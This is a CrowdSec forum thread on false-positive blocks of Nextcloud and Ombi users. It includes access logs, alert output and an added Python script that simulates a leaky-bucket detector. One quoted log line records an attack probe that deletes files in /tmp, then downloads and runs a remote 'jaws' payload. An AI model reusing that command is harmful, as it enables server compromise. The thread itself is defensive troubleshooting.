xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/package-x-generic.svg?v=0 HTTP/1.1" 200 1223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=20714 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4768 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=191296 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=257268 HTTP/1.1" 200 7218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:05 +0200] "GET /nextcloud/core/img/rating/s4.svg HTTP/1.1" 200 2040 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"

I would like to know why I get blocked and stuff like this does not:

95.137.137.171 - - [07/Aug/2022:23:27:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws" 400 483 "-" "-"
106.75.50.30 - - [08/Aug/2022:10:59:31 +0200] "GET / HTTP/1.1" 200 5563 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /favicon.ico HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /sitemap.xml HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:38 +0200] "GET /robots.txt HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
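
Added example, not part of the original posts and not CrowdSec's own code: a small offline check that replays access-log lines through a simplified leaky bucket and shows how a substring whitelist like the one above changes what gets counted. The bucket parameters, the static-extension list and the use of the request path as the "distinct" key are assumptions modelled on a crawl-style scenario such as crowdsecurity/http-crawl-non_statics (read the real values from the scenario file installed on your system), and the sample lines are constructed from the Ombi pattern in this thread.

```python
import re
from datetime import datetime

# Combined log format prefix, as in the lines quoted in this thread.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<request>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+'
)

# Assumption: extensions treated as static resources and therefore not counted.
STATIC_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico",
              ".css", ".js", ".woff", ".woff2")


def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["time"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["path"] = ev["request"].split("?", 1)[0]
    ev["static"] = ev["path"].lower().endswith(STATIC_EXT)
    return ev


def whitelisted(ev, substrings):
    """Mimic an `evt.Parsed.request contains '<substring>'` whitelist expression."""
    return any(s in ev["request"] for s in substrings)


def simulate(lines, whitelist=(), capacity=40, leakspeed=0.5):
    """Replay lines through one leaky bucket per source IP.

    capacity and leakspeed (seconds per leaked event) are assumed values.
    Returns {ip: {"counted": events poured, "overflow": bool}}.
    """
    buckets = {}
    for line in lines:
        ev = parse(line)
        if ev is None or ev["static"] or ev["verb"] not in ("GET", "HEAD"):
            continue
        if whitelisted(ev, whitelist):
            continue  # whitelisted events never reach the bucket
        b = buckets.setdefault(ev["ip"], {"level": 0.0, "last": ev["time"],
                                          "seen": set(), "counted": 0,
                                          "overflow": False})
        # Logs can be slightly out of order; never leak for negative time.
        elapsed = max(0.0, (ev["time"] - b["last"]).total_seconds())
        b["level"] = max(0.0, b["level"] - elapsed / leakspeed)
        b["last"] = max(b["last"], ev["time"])
        if b["level"] == 0.0:
            b["seen"].clear()  # an empty bucket forgets its distinct keys
        if ev["path"] in b["seen"]:
            continue  # only distinct paths are poured
        b["seen"].add(ev["path"])
        b["level"] += 1
        b["counted"] += 1
        if b["level"] > capacity:
            b["overflow"] = True
    return {ip: {"counted": b["counted"], "overflow": b["overflow"]}
            for ip, b in buckets.items()}


def sample_lines():
    """Constructed sample: 50 Ombi search calls in one second, then page loads."""
    ip, ua = "203.0.113.10", "ExampleBrowser/1.0"  # documentation IP, fake UA
    lines = [
        f'{ip} - - [07/Aug/2022:23:03:26 +0200] '
        f'"GET /ombi/api/v2/search/Movie/{i} HTTP/1.1" 200 1234 "-" "{ua}"'
        for i in range(1000, 1050)
    ]
    lines += [
        f'{ip} - - [07/Aug/2022:23:03:27 +0200] '
        f'"GET /ombi/discover/actor/15140 HTTP/1.1" 200 900 "-" "{ua}"',
        f'{ip} - - [07/Aug/2022:23:03:27 +0200] '
        f'"GET /ombi/ HTTP/1.1" 200 900 "-" "{ua}"',
        f'{ip} - - [07/Aug/2022:23:03:27 +0200] '
        f'"GET /images/default_movie_poster.png HTTP/1.1" 404 575 "-" "{ua}"',
    ]
    return lines


if __name__ == "__main__":
    print("no whitelist :", simulate(sample_lines()))
    print("with whitelist:", simulate(sample_lines(),
                                      whitelist=["/ombi/api/v2/search"]))
```

Running it on a copy of your own access log with a candidate whitelist substring shows how many events per IP would still be counted, which helps confirm the expression is no broader than it needs to be.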

Hello,

Given the behavior of ombi, I do not see a "generic" workaround for this (it would require crowdsec to do smart things and be too sensitive to false negatives).

I think the best way would be to have a whitelist for ombi to avoid this specific false positive. It should even be part of the ombi collection created by @lepresidente: CrowdSec Hub

Do you believe this false positive impacts all the default setups?

Hi,

I’m also having some difficulties with nextcloud 25.01 and crowdsec. A specific user is systematically blocked, when using the client or a webdav mount in the file explorer, from a Windows 10 system. I think that this user is being blocked because he’s trying to set up his environment and thus adding and moving (or at least trying to add or move) a lot of files in a short period. But I cannot find what is triggering the alerts and decisions, except that it’s systematically the same reason: http-probing.

I nonetheless tried to set a whitelist, but my attempts so far didn’t succeed.

Crowdsec version:

❯ cscli version
2022/11/29 21:02:23 version: v1.4.2-debian-pragmatic-3beb84bcfe05885fdd9a00f3124b4a949e45ce82
2022/11/29 21:02:23 Codename: alphaga
2022/11/29 21:02:23 BuildDate: 2022-11-15_12:45:52
2022/11/29 21:02:23 GoVersion: 1.19.2
2022/11/29 21:02:23 Platform: linux
2022/11/29 21:02:23 Constraint_parser: >= 1.0, <= 2.0
2022/11/29 21:02:23 Constraint_scenario: >= 1.0, < 3.0
2022/11/29 21:02:23 Constraint_api: v1
2022/11/29 21:02:23 Constraint_acquis: >= 1.0, < 2.0

Alert 1, with the corresponding apache log. The cscli time is UTC, and my server is on UTC+01:00.

❯ cscli alerts inspect xxxx

################################################################################################

 - ID         : xxxx
 - Date       : 2022-11-29T15:49:02Z
 - Machine    : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 - Simulation : false
 - Reason     : crowdsecurity/http-probing
 - Events Count : 13
 - Scope:Value: Ip:xxx.xxx.xxx.xxx
 - Country    : CH
 - AS         : Corp Inc.
 - Begin      : 2022-11-29 15:48:37.644899066 +0000 UTC
 - End        : 2022-11-29 15:49:01.412840179 +0000 UTC



xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:36 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 2345 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 3010 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/desktop.ini HTTP/1.1" 404 1116 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/desktop.ini HTTP/1.1" 404 1241 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7583 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/AutoRun.inf HTTP/1.1" 404 1241 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 3036 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7599 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7601 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7603 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7599 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7601 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:59 +0100] "GET /cloud/ocs/v2.php/apps/notifications/api/v2/notifications HTTP/1.1" 304 7054 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Viewer/99.9.3878.79"
